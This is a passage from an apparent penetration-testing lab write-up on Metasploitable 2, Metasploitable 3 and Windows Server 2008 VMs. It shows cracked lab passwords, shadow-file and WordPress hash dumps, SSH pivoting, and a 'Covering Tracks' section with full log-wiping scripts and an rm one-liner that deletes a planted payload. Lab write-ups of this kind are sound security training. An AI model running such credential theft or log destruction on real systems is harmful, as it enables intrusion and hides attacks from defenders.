1g 0:00:00:00 DONE (2021-10-08 08:37) 50.00g/s 8750p/s 113750c/s 113750C/s help_m3_obiwan..ch3wie
Use the "--show" option to display all of the cracked passwords reliably
Session completedIn total, using three different populated lists, these are the credentials found:
leia_organa - help_me_obiwan
han_solo - nerf_herder
luke_skywalker - like_my_father_beforeme
ben_kenobi - thats_no_m00n
vagrant - vagrant
As they were two programs used during the cracking of passwords, look at the two potfiles:
cat <path>/hashcat.potfile
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan
$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:like_my_father_beforeme
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n
cat <path>/john.pot
$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:vagrant
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00nNote: No more attempts were made. An alternative would be SQL injection on the webserver for it to dump all the passwords. This will not be done here as this lab focuses on using Metasploit.
Covering Tracks
Erase the digital footprints that the attack might have left behind.
Metasploitable 2
Having a command shell opened to 192.168.56.101 as root on the Metasploitable 2, there are two files that must be looked at - .bash_history and reset_logs.sh, both can be found in the home directory of the superuser root.
.bash_history
Attempting to print the output on the console, the output is empty. Listing the directory, including the hidden files outputs the following.
ls -la
total 76
drwxr-xr-x 13 root root 4096 Sep 8 06:26 .
drwxr-xr-x 21 root root 4096 May 20 2012 ..
-rw------- 1 root root 324 Sep 8 06:26 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
drwx------ 3 root root 4096 May 20 2012 .config
drwx------ 2 root root 4096 May 20 2012 .filezilla
drwxr-xr-x 5 root root 4096 Sep 8 06:26 .fluxbox
drwx------ 2 root root 4096 May 20 2012 .gconf
drwx------ 2 root root 4096 May 20 2012 .gconfd
drwxr-xr-x 2 root root 4096 May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4096 May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4096 May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4096 May 20 2012 .ssh
drwx------ 2 root root 4096 Sep 8 06:26 .vnc
drwxr-xr-x 2 root root 4096 May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw-r--r-- 1 root root 138 Sep 8 06:26 vnc.logThe .bash_history file has a symlink, also known as a soft link, which is a shotcut file that makes it appear as if the linked object is there.
In this scenario, the symlink links to /dev/null which is a virtual file used to write. Everything written to this specific file will be discarded, which is why it's known as the null device in any UNIX system.
It can be concluded that, if Metasploitable 2 is accessed as superuser root, not a single command used in the command shell will be saved, thus, there is no need to erase the commands used during the information gathering.
reset_logs.sh
This is also a really interesting file that is normally not found in a machine, no matter the operating system. The output of the file in the console is the following.
#!/bin/sh
/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
echo -n > $ii
rm -f $ii.? $ii.?.gz
done
/etc/init.d/samba stop
rm -f /var/log/samba/*
rm -f /var/lib/dhcp3/*
for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
echo -n > $ii
doneThis is a shell script that can be launched simply by executing ./reset_logs.sh from the command line to execute the script, as long as the permissions are correct. The file is listing all the logs from the /var/log directory from the different services running on the machine and removing them forcefully. Then, it is stopping the samba service, which provides file and print services to all SMB and CIFS clients, and deleting the logs from the service, as well as the logs from dhcp, proftpd , postgresql, and apache2.
This concludes the Covering Tracks section for the Metasploitable 2 machine.
Windows Server 2008
Having a command shell opened to 192.168.56.105 as Administrator or vagrant on the Windows 2008 Server, there are no files like the ones found previously on the Metasploitable 2. However, after some research and having the command shell opened, the logs can be deleted using a single command.
Linux 14.04
Within the machine, accessing as vagrant, there is an interesting script named .bash_logout, which appears to erase all the commands from the .bash_history file.
This file helps us with this part of our tracks.
But what about the rest of the log files?
During the exploit, the services used were ssh and ftp , although Drupalgeddon, an exploit against Drupal websites was also investigated. Nothing was changed but the execution of a payload that resides within the var/www/html directory during the execution of the ProFTPD exploit. It can be checked by listing the directories and files within the /var/log directory, taking notice of the date the files and directories were last changed or edited.
One of the options is to delete absolutely all the log files, which would rise red flags, and the other, is to truncate the log files to delete our presence in the log files. To do so, one of the things needed is to see if the files actually have evidence of our unauthorized presence in the machine and truncate the file's size approximately enough to somewhat "restore" them to what they were before the attack. Of course, one of the things to have in mind is that truncating the files might also erase what would be considered normal logs from the machine if it was being used during the time of the attack.
Another good option is to use a similar script to reset the logs, just like with the Metasploitable 2 machine adding the extra log files that we need to leave empty of our IP address and presence in the machine, run the script and immediately delete it. We could also go as far as deleting the bash history to make sure it is not mistakenly kept, despite cleaning itself up every time the user exits the command shell.
Taking a similar script like the one used to reset all the logs in Metaspoitable 2 and taking a look at the services running on the machine, could be a good shell script to run.
#!/bin/sh
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp lastlog"
cd /var/log
for ii in $VARLOGS; do
echo -n > $ii
rm -f $ii.? $ii.?.gz
done
/etc/init.d/samba stop
rm -f -r /var/log/samba/*
rm -f /var/lib/dhcp3/*
for ii in /var/log/apache2/*; do
echo -n > $ii
doneThis script could also delete the payload, as long as a line is added on removing all files in the /var/www/html directory, by using a regular expression and deleting all the files matching the pattern.
cd /var/www/html
find . -maxdepth 1 -print | grep -P "([A-Z]|[a-z]|\d){4,}\.php" | xargs -d"\n" rmThis is first finding all the .php files that have four or more lowercase and uppercase characters and digits, prints it on the command shell and removes the outputed files.
Impersonating Metasploitable 2
Re-launch the attacks on the most recent vulnerable machines using the eldest vulnerable machine, opening a Wireshark packet capture to compare how impersonating as the Metasploitable 2 changes the traffic.
Windows Server 2008
┌──(kali㉿kali)-[~]
└─$ ssh 192.168.56.101 -l msfadmin 1 ⚙
msfadmin@192.168.56.101's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue Sep 14 11:41:44 2021
msfadmin@metasploitable:~$ mysql -u root -h 192.168.56.105
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.5.20-log MySQL Community Server (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cards |
| mysql |
| performance_schema |
| test |
| wordpress |
+--------------------+
6 rows in set (0.00 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+---------------------------+
| Tables_in_wordpress |
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_nf_objectmeta |
| wp_nf_objects |
| wp_nf_relationships |
| wp_ninja_forms_fav_fields |
| wp_ninja_forms_fields |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------+
17 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 | admin | admin@example.com | | 2016-09-26 22:28:12 | | 0 | admin |
| 2 | vagrant | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ | vagrant | vagrant@example.com | | 2016-09-27 20:13:37 | | 0 | vagrant |
| 3 | user | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ | user | user@example.com | | 2016-09-27 20:14:08 | | 0 | user |
| 4 | manager | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 | manager | manager@example.com | | 2016-09-27 20:15:14 | | 0 | manager |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
4 rows in set (0.01 sec)
mysql> exit
Bye
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ exit
logout
Connection to 192.168.56.101 closed.Linux 14.04
┌──(kali㉿kali)-[~]
└─$ ssh 192.168.56.101 -l msfadmin 1 ⚙
msfadmin@192.168.56.101's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue Sep 14 17:04:15 2021 from 192.168.56.1
msfadmin@metasploitable:~$ ssh 192.168.56.106 -l vagrant
The authenticity of host '192.168.56.106 (192.168.56.106)' can't be established.
RSA key fingerprint is c9:ac:70:ef:f8:de:8b:a3:a3:44:ab:3d:32:0a:5c:6a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.106' (RSA) to the list of known hosts.
vagrant@192.168.56.106's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
Last login: Fri Sep 17 17:47:16 2021
vagrant@metasploitable3-ub1404:~$ whoami
vagrant
vagrant@metasploitable3-ub1404:~$ hostname
metasploitable3-ub1404
vagrant@metasploitable3-ub1404:~$ ls -la
total 84584
drwxr-xr-x 7 vagrant vagrant 4096 Sep 14 15:22 .
drwxr-xr-x 18 root root 4096 Oct 29 2020 ..
-rw------- 1 vagrant vagrant 99 Sep 17 17:49 .bash_history
-rw-r--r-- 1 vagrant vagrant 220 Oct 29 2020 .bash_logout
-rw-r--r-- 1 vagrant vagrant 3637 Oct 29 2020 .bashrc
drwxr-xr-x 3 root root 4096 Oct 29 2020 .bundle
drwx------ 2 vagrant vagrant 4096 Oct 29 2020 .cache
drwx------ 2 root root 4096 Oct 29 2020 .gnupg
drwxr-xr-x 55 vagrant vagrant 4096 Oct 29 2020 .npm
-rw-r--r-- 1 vagrant vagrant 675 Oct 29 2020 .profile
drwx------ 2 vagrant vagrant 4096 Sep 10 15:00 .ssh
-rw-r--r-- 1 vagrant vagrant 86562816 Oct 29 2020 VBoxGuestAdditions.iso
-rw-r--r-- 1 vagrant vagrant 5 Oct 29 2020 .vbox_version
vagrant@metasploitable3-ub1404:~$ tail .bash_logout
# ~/.bash_logout: executed by bash(1) when login shell exits.
# when leaving the console clear the screen to increase privacy
if [ "$SHLVL" = 1 ]; then
[ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi
vagrant@metasploitable3-ub1404:~$ sudo cat /etc/shadow
root:!:18564:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:18564:0:99999:7:::
sshd:*:18564:0:99999:7:::
statd:*:18564:0:99999:7:::
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:18564:0:99999:7:::
dirmngr:*:18564:0:99999:7:::
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:18564:0:99999:7:::
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:18564:0:99999:7:::
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18564:0:99999:7:::
artoo_detoo:$1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.:18564:0:99999:7:::
c_three_pio:$1$lXx7tKuo$xuM4AxkByTUD78BaJdYdG.:18564:0:99999:7:::
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.:18564:0:99999:7:::
anakin_skywalker:$1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0:18564:0:99999:7:::
jarjar_binks:$1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1:18564:0:99999:7:::
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18564:0:99999:7:::
boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18564:0:99999:7:::
jabba_hutt:$1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/:18564:0:99999:7:::
greedo:$1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1:18564:0:99999:7:::
chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18564:0:99999:7:::
kylo_ren:$1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.:18564:0:99999:7:::
mysql:!:18564:0:99999:7:::
avahi:*:18564:0:99999:7:::
colord:*:18564:0:99999:7:::
vboxadd:!:18880::::::
vagrant@metasploitable3-ub1404:~$ sudo cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/bin/false
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
dirmngr:x:105:111::/var/cache/dirmngr:/bin/sh
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
han_solo:x:1113:100::/home/han_solo:/bin/bash
artoo_detoo:x:1114:100::/home/artoo_detoo:/bin/bash
c_three_pio:x:1115:100::/home/c_three_pio:/bin/bash
ben_kenobi:x:1116:100::/home/ben_kenobi:/bin/bash
darth_vader:x:1117:100::/home/darth_vader:/bin/bash
anakin_skywalker:x:1118:100::/home/anakin_skywalker:/bin/bash
jarjar_binks:x:1119:100::/home/jarjar_binks:/bin/bash
lando_calrissian:x:1120:100::/home/lando_calrissian:/bin/bash
boba_fett:x:1121:100::/home/boba_fett:/bin/bash
jabba_hutt:x:1122:100::/home/jabba_hutt:/bin/bash
greedo:x:1123:100::/home/greedo:/bin/bash
chewbacca:x:1124:100::/home/chewbacca:/bin/bash
kylo_ren:x:1125:100::/home/kylo_ren:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
avahi:x:107:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
vagrant@metasploitable3-ub1404:~$ exit
logout
Connection to 192.168.56.106 closed.
msfadmin@metasploitable:~$ exit
logout
Connection to 192.168.56.101 closed.Exploits
List all the exploits used on the three different vulnerable machines. Rate them from 1 to 6 stars depending on the negative impact of each to the security of the machine.
⭐⭐⭐⭐⭐➕The worst vulnerability is Metasploitable 2, giving a superuser's credentials in the Telnet banner before login.
⭐⭐⭐⭐⭐➕ Metasploitable 2 and Windows 2008 Server both have password-less superuser accounts (root) allowing attackers to bypass authentiction to investigate and gather everything that is kept in the MySQL server of each respective machine. This exploit is so positive for an attacker, they will probably not want to do anything else to the machine - having gained all the information needed from just one simple exploit.
⭐⭐⭐⭐⭐Lowering the bar a little, the Metasploitable 2 is also vulnerable to a vsFTPd Backdoor allowing a command shell to be opened and access to certain files information that can be used to simply run a SSH scan with certain usernames and passwords to gain access, with the bad luck that superuser accounts use the username as the account's password, which again, opens a command shell allowing the attacker to gather all the information regarding the credentials for all accounts to crack them with tools like Hashcat and John The Ripper.
⭐⭐⭐⭐ ProFTPd Command Execution on Linux 14.04. A command shell can be opened and manual enumeration can be performed by the attacker to gather information on the user accounts and their permissions. Later, a SSH login scan can be launched with a variety of usernames and passwords, gaining at least a handful of correct user-password pairs that will render the machine exposed to what the attacker desires
⭐⭐⭐There are a handful of vulnerabilities on the Metasploitable 2 that allows the attacker to enumerate the local domain and its users, as well as launch denial of service (DoS) attacks.
⭐⭐⭐Metasploitable 2 is, by far, the most vulnerable as for each port an exploit exists that will allow the attacker to open a shell, being because of a backdoor, badly configured superuser account protection, payload execution or command injection.
Last updated